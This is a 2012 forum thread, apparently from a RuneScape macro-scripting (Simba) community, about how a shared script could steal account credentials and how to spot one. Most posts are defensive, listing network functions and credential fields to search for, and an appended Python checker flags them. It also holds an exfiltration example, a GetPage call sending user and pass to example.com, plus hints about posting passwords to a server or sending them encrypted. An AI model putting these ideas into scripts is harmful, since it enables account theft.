View Full Version : How can a script hack your account?



shadowmarkus
02-03-2012, 08:35 AM
I'm just very cautious, so I'd like to hear how someone can hack your account, via a script.

I've always checked for http sites in the script, and IPs.

How else can they make the script send my password/username, to them?

norrisemoe
02-03-2012, 08:45 AM
Shadow just for the sake of avoiding thousands of leeches from seeing this thread and giving Simba a bad name no one will answer this question directly. Or maybe they will but perhaps it would be better if someone would PM you.

trials6112
02-03-2012, 08:46 AM
just use the security thing in extensions.
it will stop any outgoing transmissions

shadowmarkus
02-03-2012, 08:48 AM
Shadow just for the sake of avoiding thousands of leeches from seeing this thread and giving Simba a bad name no one will answer this question directly. Or maybe they will but perhaps it would be better if someone would PM you.

Leechers won't know how to script it anyways.

I just want to know the indirect methods, like IP and ftp.... Won't hurt anyone..

Sex
02-03-2012, 08:50 AM
Using any of the Socket or Web libraries. If you see any of these functions in the script:

OpenWebPage
GetPage
InitializeHTTPClient
InitializeHTTPClient
GetHTTPPage
SetHTTPUserAgent
PostHTTPPage
PostHTTPPageEx
ClearPostData
AddPostVariable
GetRawHeaders
SetProxy

CreateSocket
FreeSocket
ConnectSocket
BindSocket
ListenSocket
AcceptSocket
CloseSocket
RecvSocket
RecvSocketStr
RecvSocketEx
SendSocket
SetTimeout
SocketInfo

Then the script may be malicious. Note that I said may, some scripts use them to check for versions, retrieve updates or news, etc.

Edit: Also, as stated below, check for references of .User, .Pass, and .Pin in places other than the declaration of players (use Ctrl+F to find them).

YoHoJo
02-03-2012, 09:03 AM
Don't post actual code you guys.....

shadowmarkus
02-03-2012, 09:04 AM
Using any of the Socket or Web libraries. If you see any of these functions in the script:

OpenWebPage
GetPage
InitializeHTTPClient
InitializeHTTPClient
GetHTTPPage
SetHTTPUserAgent
PostHTTPPage
PostHTTPPageEx
ClearPostData
AddPostVariable
GetRawHeaders
SetProxy

CreateSocket
FreeSocket
ConnectSocket
BindSocket
ListenSocket
AcceptSocket
CloseSocket
RecvSocket
RecvSocketStr
RecvSocketEx
SendSocket
SetTimeout
SocketInfo

Then the script may be malicious. Note that I said may, some scripts use them to check for versions, retrieve updates or news, etc. (though usually not the socket library ;p)

Edit: In response to the post below: The commit/o functions most likely contained some of the above functions so you can still feel safe if you cannot find them :).

Oh, that's a lot of functions.

I just thought/hoped that you could only do it with websites/ips, but as I can see in the example above, it can be made into an algorithm so it's harder to spot.. :S

Er1k
02-03-2012, 09:04 AM
E: noted

I would check any references of name/pass/pin in the script. It should never be used anywhere other than the login/banking.

shadowmarkus
02-03-2012, 09:06 AM
.

I would check any references of name/pass/pin in the script. It should never be used anywhere other than the login/banking.

Yeah, exactly. It's an algorithm right? that functions as a website, but we can't see it without studying the script...?

weequ
02-03-2012, 09:07 AM
You should always check if the password field (Like Players[x].pass) is used anywhere in the script where it shouldn't be. Someone could for example make their script pm everyone's password to him through runescape and security extension would say nothing, I think.

They could even send it encrypted so you wouldn't notice.

Er1k
02-03-2012, 09:08 AM
Yeah, exactly. It's an algorithm right? that functions as a website, but we can't see it without studying the script...?

No. It was gibberish code to confuse you and it was a bad attempt of doing it anyway.

trials6112
02-03-2012, 09:08 AM
yeah, but in order to protect your account you would look over the script in the first place, wouldn't you?

I look over every script before I use it :)

shadowmarkus
02-03-2012, 09:10 AM
yeah, but in order to protect your account you would look over the script in the first place, wouldn't you?

I look over every script before I use it :)

Yes........?

That's what the thread is about. How to detect a malicious script, while looking through it.

cycrosism
02-03-2012, 09:11 AM
Using any of the Socket or Web libraries. If you see any of these functions in the script:

OpenWebPage
GetPage
InitializeHTTPClient
InitializeHTTPClient
GetHTTPPage
SetHTTPUserAgent
PostHTTPPage
PostHTTPPageEx
ClearPostData
AddPostVariable
GetRawHeaders
SetProxy

CreateSocket
FreeSocket
ConnectSocket
BindSocket
ListenSocket
AcceptSocket
CloseSocket
RecvSocket
RecvSocketStr
RecvSocketEx
SendSocket
SetTimeout
SocketInfo

Then the script may be malicious. Note that I said may, some scripts use them to check for versions, retrieve updates or news, etc. (though usually not the socket library ;p)

Edit: In response to the post below: The commit/o functions most likely contained some of the above functions so you can still feel safe if you cannot find them :).

There is no way a script can steal your password if it uses the "GetPage" function. Look up what it does... I used that function in my script to check for a newer version of the script, and if there was it would alert the user. But that function does no sending of data whatsoever.

trials6112
02-03-2012, 09:11 AM
You should always check if the password field (Like Players[x].pass) is used anywhere in the script where it shouldn't be. Someone could for example make their script pm everyone's password to him through runescape and security extension would say nothing, I think.

The Security extension stops outgoing transmissions for the most part, but as we get smarter so do they.
An example of this is keyloggers: once they were run-of-the-mill and easily detected with virus scanners; now they are changed so that they cannot be detected by the majority of virus scanners, including Malwarebytes.

IMO everyone should get an ExterminateIT license; it has done a world of good for me, and stopped a number of drive-bys, and also stopped a number of wannabe infiltrators.

PhaseCode
02-03-2012, 09:12 AM
Just get the username and password from the Declare Player and post it to a server.

Sex
02-03-2012, 09:12 AM
You should always check if the password field (Like Players[x].pass) is used anywhere in the script where it shouldn't be. Someone could for example make their script pm everyone's password to him through runescape and security extension would say nothing, I think.

They could even send it encrypted so you wouldn't notice.

Oh, interesting. Yeah, that would be a better way of doing this :p. Just Ctrl+F for references of .Pass, .User, and .Pin.


The Security extension stops outgoing transmissions for the most part, but as we get smarter so do they.
An example of this is keyloggers: once they were run-of-the-mill and easily detected with virus scanners; now they are changed so that they cannot be detected by the majority of virus scanners, including Malwarebytes.

IMO everyone should get an ExterminateIT license; it has done a world of good for me, and stopped a number of drive-bys, and also stopped a number of wannabe infiltrators.

I must say, I was about to report you as a bot..

trials6112
02-03-2012, 09:12 AM
Yes........?

That's what the thread is about. How to detect a malicious script, while looking through it.

Yes I should, I quoted the previous posted about the diff variables to look for, that's what I mean I look over the script for.

My apologies for any confusion

shadowmarkus
02-03-2012, 09:13 AM
Just get the username and password from the Declare Player and post it to a server.

What? Have you even read the thread? :duh:


Oh, interesting. Yeah, that would be a better way of doing this :p. Just Ctrl+F for references of .Pass, .User, and .Pin.


I must say, I was about to report you as a bot..

A lot faster than your way at least :p

shadowmarkus
02-03-2012, 09:14 AM
Accidental doublepost.

trials6112
02-03-2012, 09:17 AM
I must say, I was about to report you as a bot..

What and why is that?
Because I forgot to quote something, I do so apologise for that slight inconvenience, and I will try not to allow that to happen again.

But that was why yes?

Sex
02-03-2012, 09:34 AM
What and why is that?
Because I forgot to quote something, I do so apologise for that slight inconvenience, and I will try not to allow that to happen again.

But that was why yes?

Yeah :p. It wasn't meant to be a hostile remark...

trials6112
02-03-2012, 09:44 AM
Yeah :p. It wasn't meant to be a hostile remark...

Nor did I take it as one, I took it as it was meant to be taken :)
I understand that spam bots have been here trying to raise post counts, anyways with that said sorry for going off topic shadow :)

Sex
02-03-2012, 09:47 AM
There is no way a script can steal your password if it uses the "GetPage" function. Look up what it does... I used that function in my script to check for a newer version of the script, and if there was it would alert the user. But that function does no sending of data whatsoever.

I was just listing the contents of the Web library. However, the GetPage function CAN send data.


GetPage('http://example.com?user=' + User + '&pass=' + Pass);

To be more specific, GetPage can still send GET variables.
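
Added example, not part of the original thread and not Simba's own tooling: a small Python pre-run review pass that automates the two checks discussed above, flagging calls to the listed Web/Socket functions and any read of .User, .Pass or .Pin outside its declaration. The sample script is constructed; TypePassword and Latest are hypothetical names.

```python
import re

# Web and Socket library functions listed in the thread.
NETWORK_FUNCS = (
    "OpenWebPage", "GetPage", "InitializeHTTPClient", "GetHTTPPage",
    "SetHTTPUserAgent", "PostHTTPPage", "PostHTTPPageEx", "ClearPostData",
    "AddPostVariable", "GetRawHeaders", "SetProxy", "CreateSocket",
    "FreeSocket", "ConnectSocket", "BindSocket", "ListenSocket", "AcceptSocket",
    "CloseSocket", "RecvSocket", "RecvSocketStr", "RecvSocketEx", "SendSocket",
    "SetTimeout", "SocketInfo",
)
# Credential fields named in the thread, matched only as record fields (.Pass).
CRED_FIELDS = ("User", "Pass", "Pin")

# Pascal is case-insensitive, so both patterns ignore case.
NET_RE = re.compile(r"\b(" + "|".join(NETWORK_FUNCS) + r")\b", re.I)
# A field followed by ':=' is the declaration; anything else reads the value.
CRED_RE = re.compile(r"\.(" + "|".join(CRED_FIELDS) + r")\b(?!\s*:=)", re.I)

def review(source):
    """Return (line number, kind, names) for every line a reviewer should read.
    Comments are not stripped: '//' also occurs inside URL strings, and a
    false positive costs less here than a missed line."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        net = sorted({m.group(1) for m in NET_RE.finditer(line)})
        cred = sorted({m.group(1) for m in CRED_RE.finditer(line)})
        if not (net or cred):
            continue
        kind = ("credential-in-network-call" if net and cred
                else "network-call" if net else "credential-read")
        findings.append((no, kind, net + cred))
    return findings

# Constructed sample script; TypePassword and Latest are hypothetical names.
SAMPLE = """\
procedure DeclarePlayers;
begin
  Players[0].User := 'name';
  Players[0].Pass := 'secret';
  Players[0].Pin := '0000';
end;
begin
  Latest := GetPage('http://example.com/version.txt');
  GetPage('http://example.com?user=' + Players[0].User + '&pass=' + Players[0].Pass);
  TypePassword(Players[0].Pass);
end.
"""

if __name__ == "__main__":
    for finding in review(SAMPLE):
        print(finding)
```

A "network-call" hit alone may be a version check, as noted in the thread; a "credential-read" hit outside the login/banking code is the one to trace by hand, since the value can be copied into another variable or sent without any network function at all.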